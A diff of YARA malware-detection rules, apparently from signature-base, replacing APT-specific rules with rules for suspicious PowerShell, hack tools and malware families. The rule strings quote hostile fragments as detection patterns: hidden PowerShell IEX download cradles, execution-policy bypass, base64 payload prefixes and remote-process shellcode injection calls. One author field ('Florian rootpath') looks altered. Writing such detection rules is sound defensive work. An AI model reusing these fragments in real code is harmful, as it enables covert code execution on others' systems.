+		$x2 = ".Run\"powershell.exe -nop -w hidden -c \"\"IEX " ascii
+		$s1 = "window.resizeTo 0,0" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them ) or ( pe.exports ( "__dec" ) and pe.exports ( "_check" ) and pe.exports ( "_dec" ) and pe.exports ( "start" ) and pe.exports ( "test" ) )
+		( filesize < 2KB and 1 of them )
 }
-rule SIGNATURE_BASE_Wiltedtulip_Zpp : FILE
+rule SIGNATURE_BASE_Susp_Powershell_Sep17_2 : FILE
 {
 	meta:
-		description = "Detects hack tool used in Operation Wilted Tulip"
+		description = "Detects suspicious PowerShell script in combo with VBS or JS "
 		author = "Florian Roth (Nextron Systems)"
-		id = "7d833cb2-485e-5a26-be2f-aaebde7fdef2"
-		date = "2017-07-23"
-		modified = "2022-12-21"
-		reference = "http://www.clearskysec.com/tulip"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_wilted_tulip.yar#L191-L215"
+		id = "e44d1dfc-0858-5248-a57f-efb5c647f4cc"
+		date = "2017-09-30"
+		modified = "2024-04-03"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_susp.yar#L150-L170"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "32c91f8a02443a6f024acb3f941b7f11472e7f1517c54a3c7edc89ce88ba73e0"
-		score = 75
+		logic_hash = "0819f57afb6d1d878e4db4079bfd43ccac520829c877de04d16d8bd048a35ab5"
+		score = 65
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "10ec585dc1304436821a11e35473c0710e844ba18727b302c6bd7f8ebac574bb"
-		hash2 = "7d046a3ed15035ea197235980a72d133863c372cc27545af652e1b2389c23918"
-		hash3 = "6d6816e0b9c24e904bc7c5fea5951d53465c478cc159ab900d975baf8a0921cf"
+		hash1 = "e387f6c7a55b85e0675e3b91e41e5814f5d0ae740b92f26ddabda6d4f69a8ca8"
 
 	strings:
-		$x1 = "[ERROR] Error Main -i -s -d -gt -lt -mb" fullword wide
-		$x2 = "[ERROR] Error Main -i(with.) -s -d -gt -lt -mb -o -e" fullword wide
-		$s1 = "LT Time invalid" fullword wide
-		$s2 = "doCompressInNetWorkDirectory" fullword ascii
-		$s3 = "files remaining ,total file save = " fullword wide
-		$s4 = "$ec996350-79a4-477b-87ae-2d5b9dbe20fd" fullword ascii
-		$s5 = "Destinition Directory Not Found" fullword wide
-		$s6 = "\\obj\\Release\\ZPP.pdb" ascii
+		$x1 = ".Run \"powershell.exe -nop -w hidden -e " ascii
+		$x2 = "FileExists(path + \"\\..\\powershell.exe\")" fullword ascii
+		$x3 = "window.moveTo -4000, -4000" fullword ascii
+		$s1 = "= CreateObject(\"Wscript.Shell\")" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 30KB and ( 1 of ( $x* ) or 3 of them )
+		filesize < 20KB and ( ( uint16( 0 ) == 0x733c and 1 of ( $x* ) ) or 2 of them )
 }
-rule SIGNATURE_BASE_Wiltedtulip_Netsrv_Netsrvs : FILE
+rule SIGNATURE_BASE_Wscript_Shell_Powershell_Combo : FILE
 {
 	meta:
-		description = "Detects sample from Operation Wilted Tulip"
+		description = "Detects malware from Middle Eastern campaign reported by Talos"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4b58bb08-88da-535c-8ce5-e7113e5b7045"
-		date = "2017-07-23"
-		modified = "2023-12-05"
-		reference = "http://www.clearskysec.com/tulip"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_wilted_tulip.yar#L217-L242"
+		id = "265ec471-d9ed-5cb6-a32b-cfa62fccdf64"
+		date = "2018-02-07"
+		modified = "2024-04-03"
+		reference = "http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_susp.yar#L172-L193"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1506d1eddd43731c00e5f01a292589b07de5055bbdd7b1f7c2d7ac7a09b8ae58"
-		score = 75
+		logic_hash = "0ab5808593c999c1ce342051a8e292153aa20516cf48071565d677399adfb160"
+		score = 50
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a062cb4364125427b54375d51e9e9afb0baeb09b05a600937f70c9d6d365f4e5"
-		hash2 = "afa563221aac89f96c383f9f9f4ef81d82c69419f124a80b7f4a8c437d83ce77"
-		hash3 = "acf24620e544f79e55fd8ae6022e040257b60b33cf474c37f2877c39fbf2308a"
-		hash4 = "bff115d5fb4fd8a395d158fb18175d1d183c8869d54624c706ee48a1180b2361"
-		hash5 = "07ab795eeb16421a50c36257e6e703188a0fef9ed87647e588d0cd2fcf56fe43"
+		hash1 = "15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b"
 
 	strings:
-		$s1 = "Process %d Created" fullword ascii
-		$s2 = "%s\\system32\\rundll32.exe" fullword wide
-		$s3 = "%s\\SysWOW64\\rundll32.exe" fullword wide
-		$c1 = "slbhttps" fullword ascii
-		$c2 = "/slbhttps" fullword wide
-		$c3 = "/slbdnsk1" fullword wide
-		$c4 = "netsrv" fullword wide
-		$c5 = "/slbhttps" fullword wide
+		$s1 = ".CreateObject(\"WScript.Shell\")" ascii
+		$p1 = "powershell.exe" fullword ascii
+		$p2 = "-ExecutionPolicy Bypass" fullword ascii
+		$p3 = "[System.Convert]::FromBase64String(" ascii
+		$fp1 = "Copyright: Microsoft Corp." ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( all of ( $s* ) and 1 of ( $c* ) ) )
+		filesize < 400KB and $s1 and 1 of ( $p* ) and not 1 of ( $fp* )
 }
-
-rule SIGNATURE_BASE_Wiltedtulip_Reflectiveloader : FILE
+rule SIGNATURE_BASE_SUSP_Powershell_String_K32_Remprocess : FILE
 {
 	meta:
-		description = "Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip"
+		description = "Detects suspicious PowerShell code that uses Kernel32, RemoteProccess handles or shellcode"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0c7dfb44-8acb-5f36-9683-745560f1f795"
-		date = "2017-07-23"
-		modified = "2023-12-05"
-		reference = "http://www.clearskysec.com/tulip"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_wilted_tulip.yar#L244-L268"
+		id = "ad646e19-b132-5594-bea2-d74e96c06ebb"
+		date = "2018-03-31"
+		modified = "2024-04-03"
+		reference = "https://github.com/nccgroup/redsnarf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_susp.yar#L195-L215"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9488d2e97d0ea031a138e72964a3b56781f9d05c1676ff0b360407db944e26de"
-		score = 75
+		logic_hash = "03c80de8e59e640709c4ee1912dc47c398e265f9b88845a6de88031e2eb46ba3"
+		score = 65
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904"
-		hash2 = "1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a"
-		hash3 = "a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f"
-		hash4 = "cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0"
-		hash5 = "eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89"
+		hash3 = "54a8dd78ec4798cf034c7765d8b2adfada59ac34d019e77af36dcaed1db18912"
+		hash4 = "6d52cdd74edea68d55c596554f47eefee1efc213c5820d86e64de0853a4e46b3"
 
 	strings:
-		$x1 = "powershell -nop -exec bypass -EncodedCommand \"%s\"" fullword ascii
-		$x2 = "%d is an x86 process (can't inject x64 content)" fullword ascii
-		$x3 = "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s" fullword ascii
-		$x4 = "Failed to impersonate token from %d (%u)" fullword ascii
-		$x5 = "Failed to impersonate logged on user %d (%u)" fullword ascii
-		$x6 = "%s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s" fullword ascii
+		$x1 = "Throw \"Unable to allocate memory in the remote process for shellcode\"" fullword ascii
+		$x2 = "$Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke(\"kernel32.dll\")" fullword ascii
+		$s3 = "$RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants." ascii
+		$s7 = "if ($RemoteProcHandle -eq [IntPtr]::Zero)" fullword ascii
+		$s8 = "if (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength))" fullword ascii
+		$s9 = "$Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, " ascii
+		$s15 = "$TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 600KB and 1 of them ) or ( 2 of them ) or pe.exports ( "_ReflectiveLoader@4" )
+		uint16( 0 ) == 0x7566 and filesize < 6000KB and 1 of them
 }
-rule SIGNATURE_BASE_Wiltedtulip_Matryoshka_RAT : FILE
+rule SIGNATURE_BASE_Powershell_JAB_B64 : FILE
 {
 	meta:
-		description = "Detects Matryoshka RAT used in Operation Wilted Tulip"
+		description = "Detects base464 encoded $ sign at the beginning of a string"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e851e212-bb71-55c9-9bc1-0041bb04bef5"
-		date = "2017-07-23"
-		modified = "2023-12-05"
-		reference = "http://www.clearskysec.com/tulip"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_wilted_tulip.yar#L270-L289"
+		id = "c18fa17b-aaa5-5a89-bc25-3cc51b5af103"
+		date = "2018-04-02"
+		modified = "2024-04-03"
+		reference = "https://twitter.com/ItsReallyNick/status/980915287922040832"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_susp.yar#L217-L231"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9e878d9e3dc3f2050e52a046038f4f855b5b777948d928e0bc6d7a98fc0a7119"
-		score = 75
-		quality = 85
+		logic_hash = "4746a73774f945e63455ca7dd58ef67290f7c66d2dca80d06d52d2545c69a190"
+		score = 60
+		quality = 83
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6f208473df0d31987a4999eeea04d24b069fdb6a8245150aa91dfdc063cd64ab"
-		hash2 = "6cc1f4ecd28b833c978c8e21a20a002459b4a6c21a4fbaad637111aa9d5b1a32"
-
-	strings:
-		$s1 = "%S:\\Users\\public" fullword wide
-		$s2 = "ntuser.dat.swp" fullword wide
-		$s3 = "Job Save / Load Config" fullword wide
-		$s4 = ".?AVPSCL_CLASS_JOB_SAVE_CONFIG@@" fullword ascii
-		$s5 = "winupdate64.com" fullword ascii
-		$s6 = "Job Save KeyLogger" fullword wide
+
+	strings:
+		$s1 = "('JAB" ascii wide
+		$s2 = "powershell" nocase
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and 3 of them )
+		filesize < 30KB and all of them
 }
-rule SIGNATURE_BASE_APT_Lazarus_Aug18_Downloader_1 : FILE
+rule SIGNATURE_BASE_SUSP_PS1_Frombase64String_Content_Indicator : FILE
 {
 	meta:
-		description = "Detects Lazarus Group Malware Downloadery"
+		description = "Detects suspicious base64 encoded PowerShell expressions"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f536db7b-b645-522f-b750-6431878d2e31"
-		date = "2018-08-24"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/operation-applejeus/87553/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lazarus_applejeus.yar#L13-L37"
+		id = "326c83ff-5d21-508f-b935-03ccdab6efa7"
+		date = "2020-01-25"
+		modified = "2024-04-03"
+		reference = "https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_susp.yar#L233-L284"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f6bdaa8aa76da3e679094ae9759a67b5db33d0445f7204ff13e400fa6db60386"
-		score = 75
-		quality = 85
+		logic_hash = "a9ec7a00e9faee5cc081a2bc86abf8027fcd3cfe590cdd4f2f99425b6723f23f"
+		score = 65
+		quality = 83
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d555dcb6da4a6b87e256ef75c0150780b8a343c4a1e09935b0647f01d974d94d"
-		hash2 = "bdff852398f174e9eef1db1c2d3fefdda25fe0ea90a40a2e06e51b5c0ebd69eb"
-		hash3 = "e2199fc4e4b31f7e4c61f6d9038577633ed6ad787718ed7c39b36f316f38befd"
 
 	strings:
-		$x1 = "H:\\DEV\\TManager\\" ascii
-		$x2 = "\\Release\\dloader.pdb" ascii
-		$x3 = "Z:\\jeus\\"
-		$x4 = "\\Debug\\dloader.pdb" ascii
-		$x5 = "Moz&Wie;#t/6T!2yW29ab@ad%Df324V$Yd" fullword ascii
-		$s1 = "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" fullword ascii
-		$s2 = "Error protecting memory page" fullword ascii
+		$ = "::FromBase64String(\"H4s" ascii wide
+		$ = "::FromBase64String(\"TVq" ascii wide
+		$ = "::FromBase64String(\"UEs" ascii wide
+		$ = "::FromBase64String(\"JAB" ascii wide
+		$ = "::FromBase64String(\"SUVY" ascii wide
+		$ = "::FromBase64String(\"SQBFAF" ascii wide
+		$ = "::FromBase64String(\"SQBuAH" ascii wide
+		$ = "::FromBase64String(\"PAA" ascii wide
+		$ = "::FromBase64String(\"cwBhA" ascii wide
+		$ = "::FromBase64String(\"aWV4" ascii wide
+		$ = "::FromBase64String(\"aQBlA" ascii wide
+		$ = "::FromBase64String(\"R2V0" ascii wide
+		$ = "::FromBase64String(\"dmFy" ascii wide
+		$ = "::FromBase64String(\"dgBhA" ascii wide
+		$ = "::FromBase64String(\"dXNpbm" ascii wide
+		$ = "::FromBase64String(\"H4sIA" ascii wide
+		$ = "::FromBase64String(\"Y21k" ascii wide
+		$ = "::FromBase64String(\"Qzpc" ascii wide
+		$ = "::FromBase64String(\"Yzpc" ascii wide
+		$ = "::FromBase64String(\"IAB" ascii wide
+		$ = "::FromBase64String('H4s" ascii wide
+		$ = "::FromBase64String('TVq" ascii wide
+		$ = "::FromBase64String('UEs" ascii wide
+		$ = "::FromBase64String('JAB" ascii wide
+		$ = "::FromBase64String('SUVY" ascii wide
+		$ = "::FromBase64String('SQBFAF" ascii wide
+		$ = "::FromBase64String('SQBuAH" ascii wide
+		$ = "::FromBase64String('PAA" ascii wide
+		$ = "::FromBase64String('cwBhA" ascii wide
+		$ = "::FromBase64String('aWV4" ascii wide
+		$ = "::FromBase64String('aQBlA" ascii wide
+		$ = "::FromBase64String('R2V0" ascii wide
+		$ = "::FromBase64String('dmFy" ascii wide
+		$ = "::FromBase64String('dgBhA" ascii wide
+		$ = "::FromBase64String('dXNpbm" ascii wide
+		$ = "::FromBase64String('H4sIA" ascii wide
+		$ = "::FromBase64String('Y21k" ascii wide
+		$ = "::FromBase64String('Qzpc" ascii wide
+		$ = "::FromBase64String('Yzpc" ascii wide
+		$ = "::FromBase64String('IAB" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( ( 1 of ( $x* ) or 2 of them ) )
+		filesize < 5000KB and 1 of them
 }
-
-rule SIGNATURE_BASE_APT_Lazarus_Aug18_1 : FILE
+rule SIGNATURE_BASE_HKTL_Natbypass_Dec22_1 : T1090 FILE
 {
 	meta:
-		description = "Detects Lazarus Group Malware"
+		description = "Detects NatBypass tool (also used by APT41)"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fda4970a-2787-5e9c-9944-a6222145f4a7"
-		date = "2018-08-24"
+		id = "54af4d84-72f7-5ec4-b0bf-7ba228fdf508"
+		date = "2022-12-27"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/operation-applejeus/87553/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lazarus_applejeus.yar#L39-L60"
+		reference = "https://github.com/cw1997/NATBypass"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/hktl_natbypass.yar#L2-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "efd43e2d84ba964e7fc7e6c03eaba3dd5181c9cbe51b4a06a7a723dca95fab17"
-		score = 75
+		logic_hash = "8af76d7d9d4500dc219090fbd8ca8cd9fd17bfc224f14a411febfd6f75b92206"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ef400d73c6920ac811af401259e376458b498eb0084631386136747dfc3dcfa8"
-		hash2 = "1b8d3e69fc214cb7a08bef3c00124717f4b4d7fd6be65f2829e9fd337fc7c03c"
+		tags = "T1090, FILE"
+		hash1 = "4550635143c9997d5499d1d4a4c860126ee9299311fed0f85df9bb304dca81ff"
 
 	strings:
-		$s1 = "mws2_32.dll" fullword wide
-		$s2 = "%s.bat" fullword wide
-		$s3 = "%s%s%s \"%s > %s 2>&1\"" fullword wide
-		$s4 = "Microsoft Corporation. All rights reserved." fullword wide
-		$s5 = "ping 127.0.0.1 -n 3" fullword wide
+		$x1 = "nb -slave 127.0.0.1:3389 8.8.8.8:1997" ascii
+		$x2 = "| Welcome to use NATBypass Ver" ascii
+		$s1 = "main.port2host.func1" ascii fullword
+		$s2 = "start to transmit address:" ascii
+		$s3 = "^(\\d{1,2}|1\\d\\d|2[0-4]\\d|25[0-5])\\.(\\d{1,2}|1\\d\\d|2[0-4]\\d|25[0-5])\\.(\\d{1,2}|1\\d\\d|2[0-4]\\d|25[0-5])\\.(\\d{1,2}|1\\d\\d|2[0-4]\\d|25[0-5])"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( pe.imphash ( ) == "3af996e4f960108533e69b9033503f40" or 4 of them )
+		filesize < 8000KB and ( 1 of ( $x* ) or 2 of them ) or 3 of them
 }
-rule SIGNATURE_BASE_APT_Lazarus_Aug18_2 : FILE
+rule SIGNATURE_BASE_Beepservice_Hacktool : FILE
 {
 	meta:
-		description = "Detects Lazarus Group Malware"
+		description = "Detects BeepService Hacktool used by Chinese APT groups"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3c77d603-6443-5e78-8a8a-a89112619aa6"
-		date = "2018-08-24"
+		id = "8813a01a-10db-52e7-bb1e-322864e87b15"
+		date = "2016-05-12"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/operation-applejeus/87553/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lazarus_applejeus.yar#L62-L82"
+		reference = "https://goo.gl/p32Ozf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_beepservice.yar#L10-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "75d52ad829383392d9eb20a8308278d073d16f7624e60010356534bdc6acc81f"
-		score = 75
+		logic_hash = "176136e8a5ffec258caebf8d6b452b556093c5998414a7c9a4451ad78482f862"
+		score = 85
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8ae766795cda6336fd5cad9e89199ea2a1939a35e03eb0e54c503b1029d870c4"
-		hash2 = "d3ef262bae0beb5d35841d131b3f89a9b71a941a86dab1913bda72b935744d2e"
+		hash1 = "032df812a68852b6f3822b9eac4435e531ca85bdaf3ee99c669134bd16e72820"
+		hash2 = "e30933fcfc9c2a7443ee2f23a3df837ca97ea5653da78f782e2884e5a7b734f7"
+		hash3 = "ebb9c4f7058e19b006450b8162910598be90428998df149977669e61a0b7b9ed"
+		hash4 = "6db2ffe7ec365058f9d3b48dcca509507c138f19ade1adb5f13cf43ea0623813"
 
 	strings:
-		$s1 = "vAdvapi32.dll" fullword wide
-		$s2 = "lws2_32.dll" fullword wide
-		$s3 = "%s %s > \"%s\" 2>&1" fullword wide
-		$s4 = "Not Service" fullword wide
-		$s5 = "ping 127.0.0.1 -n 3" fullword wide
+		$x1 = "\\\\%s\\admin$\\system32\\%s" fullword ascii
+		$s1 = "123.exe" fullword ascii
+		$s2 = "regclean.exe" fullword ascii
+		$s3 = "192.168.88.69" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( 4 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and $x1 and 1 of ( $s* )
 }
-rule SIGNATURE_BASE_APT_Fallchill_RC4_Keys : FILE
+rule SIGNATURE_BASE_Scarcruft_Malware_Feb18_1 : FILE
 {
 	meta:
-		description = "Detects FallChill RC4 keys"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ead7d84c-91aa-58b0-af3b-1211b0bde864"
-		date = "2018-08-21"
+		description = "Detects Scarcruft malware - February 2018"
+		author = "Florian rootpath"
+		id = "43a87f2a-cf60-5035-8d40-c360a789a1ac"
+		date = "2018-02-03"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/operation-applejeus/87553/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lazarus_applejeus.yar#L84-L100"
+		reference = "https://twitter.com/craiu/status/959477129795731458"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_scarcruft.yar#L2-L15"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "59861618dba256996d7bbcd94a6efccdb64589fc75086bfe7d980fa51761ef97"
-		score = 75
+		logic_hash = "fa1ed130518a2096bd731dce917512d560160e271ad8f0ccd57fbedd478a5502"
+		score = 90
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$cod0 = { c7 ?? ?? da e1 61 ff
-                c7 ?? ?? 0c 27 95 87
-                c7 ?? ?? 17 57 a4 d6
-                c7 ?? ?? ea e3 82 2b }
+		$x1 = "d:\\HighSchool\\version 13\\2ndBD\\T+M\\" ascii
+		$x2 = "cmd.exe /C ping 0.1.1.2" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them
 }
-rule SIGNATURE_BASE_Bytes_Used_In_AES_Key_Generation : FILE
+rule SIGNATURE_BASE_APT_MAL_DTRACK_Oct19_1 : FILE
 {
 	meta:
-		description = "Detects Backdoor.goodor"
-		author = "NCSC"
-		id = "26a549dd-cbd2-5abc-8d9d-5ea354d0ece8"
-		date = "2018-04-06"
+		description = "Detects DTRACK malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "802135bd-234d-574d-b111-fcc9eaa000f8"
+		date = "2019-10-28"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ncsc_report_04_2018.yar#L9-L22"
+		reference = "https://twitter.com/a_tweeter_user/status/1188811977851887616?s=21"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_dtrack.yar#L2-L44"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b5278301da06450fe4442a25dda2d83d21485be63598642573f59c59e980ad46"
-		logic_hash = "221f5ea0a0224a96588912e7ddfbafd20b0b10c119395ca14d1138c284d7b79e"
+		logic_hash = "b99bc8ec4df7185da306365dc2a24a0849ff0d5d92269daaa1efbb20f5e5bf83"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c5c1ca4382f397481174914b1931e851a9c61f029e6b3eb8a65c9e92ddf7aa4c"
+		hash2 = "a0664ac662802905329ec6ab3b3ae843f191e6555b707f305f8f5a0599ca3f68"
+		hash3 = "93a01fbbdd63943c151679d037d32b1d82a55d66c6cb93c40ff63f2b770e5ca9"
+		hash4 = "3cc9d9a12f3b884582e5c4daf7d83c4a510172a836de90b87439388e3cde3682"
+		hash5 = "bfb39f486372a509f307cde3361795a2f9f759cbeb4cac07562dcbaebc070364"
+		hash6 = "58fef66f346fe3ed320e22640ab997055e54c8704fc272392d71e367e2d1c2bb"
+		hash7 = "9d9571b93218f9a635cfeb67b3b31e211be062fd0593c0756eb06a1f58e187fd"
 
 	strings:
-		$a1 = {35 34 36 35 4B 4A 55 54 5E 49 55 5F 29 7B 68 36 35 67 34 36 64 66 35 68}
+		$xc1 = { 25 73 2A 2E 2A 00 00 00 5C 00 00 00 25 73 7E 00
+               5C 00 00 00 77 62 00 00 64 61 74 00 64 6B 77 65
+               72 6F 33 38 6F 65 72 41 5E 74 40 23 00 00 00 00
+               63 3A 5C 00 25 73 5C 25 63 2E 74 6D 70 }
+		$sx1 = "%02d.%02d.%04d - %02d:%02d:%02d:%03d : " fullword ascii
+		$sx2 = "%s\\%c.tmp" fullword ascii
+		$sx3 = "dkwero38oerA" fullword ascii
+		$sx4 = "awz2qr21yfbj" fullword ascii
+		$s1 = "Execute_%s.log" ascii
+		$s2 = "%s\\%s\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" fullword ascii
+		$s3 = "CCS_Mozilla/5.0" fullword ascii
+		$s4 = "\\C$\\Windows\\Temp\\MpLogs\\" ascii
+		$s5 = "127.0.0.1 >NUL & echo EEEE > \"%s\"" fullword ascii
+		$s6 = "[+] DownloadCommand" fullword ascii
+		$s7 = "DC-Error: Too long cmd length" fullword ascii
+		$s8 = "%s\\~%d.tmp" fullword ascii
+		$s9 = "%02X:%02X:%02X:%02X:%02X:%02X" ascii fullword
+		$op1 = { 0f b6 8d a3 fc ff ff 85 c9 74 09 8b 55 f4 83 c2 }
+		$op2 = { 6a 00 8d 85 28 fc ff ff 50 6a 04 8d 4d f8 51 8b }
+		$op3 = { 8b 85 c8 fd ff ff 03 85 a4 fc ff ff 89 85 b4 fc }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 5000KB and all of ( $a* )
+		$xc1 or 2 of ( $sx* ) or 4 of them or ( uint16( 0 ) == 0x5a4d and filesize <= 3000KB and 2 of them )
 }
-rule SIGNATURE_BASE_Partial_Implant_ID : FILE
+rule SIGNATURE_BASE_SUSP_Obfuscated_JS_Obfuscatorio : HIGHVOL FILE
 {
 	meta:
-		description = "Detects implant from NCSC report"
-		author = "NCSC"
-		id = "15144f4a-2c96-57f0-b7e9-adbac477c38a"
-		date = "2018-04-06"
+		description = "Detects JS obfuscation done by the js obfuscator (often malicious)"
+		author = "@imp0rtp3"
+		id = "d808f96c-21c9-59c7-b3c7-f118d39d564e"
+		date = "2021-08-25"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ncsc_report_04_2018.yar#L24-L37"
+		reference = "https://obfuscator.io"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_js_obfuscatorio.yar#L1-L39"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b5278301da06450fe4442a25dda2d83d21485be63598642573f59c59e980ad46"
-		logic_hash = "d0a29bed3c19007cb08427769918b0a02d5d247211a1ceaff31aed5839c78966"
-		score = 75
-		quality = 83
-		tags = "FILE"
